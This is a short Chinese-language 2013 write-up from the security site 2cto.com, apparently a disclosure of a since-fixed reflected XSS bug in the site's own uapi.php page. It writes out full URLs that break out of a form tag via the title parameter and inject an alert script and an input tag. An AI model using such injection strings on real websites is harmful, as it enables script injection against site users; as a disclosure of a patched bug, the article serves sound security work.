频道栏目
首页 > 安全 > 网站安全 > 正文

红黑联盟(2cto.com)XSS[已修复]

2013-01-19 08:06:09         来源:H3art   作者:H3art
收藏   我要投稿
Author:H3art
Data:Jan 19,2013

地址:http://www.2cto.com/uapi.php?tid=183269&catid=19&title=

\
下面我们在title= 后面输入 h3art  地址变成http://www.2cto.com/uapi.php?tid=183269&catid=19&title=h3art
\查看源码
\
刚才输入的h3art"> 封闭了前面的<form  然后后面的“method="post".........name="myf">  就在页面上显示了出来 
下面接着输入<script>alert("H3art")</script>  地址变成http://www.2cto.com/uapi.php?tid=183269&catid=19&title=h3art“><script>alert("H3art")</script>
\
查看源码
\ 输入 <input name="xss 地址变成http://www.2cto.com/uapi.php?tid=183269&catid=19&title=h3art“><script>alert("H3art")</script><input name="xss
\ 查看源码
\
相关TAG标签 联盟
上一篇:Web安全,向“前”看!——读国内第一本Web前端黑客书
下一篇:今晚看啥存储型xss及sql注入
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站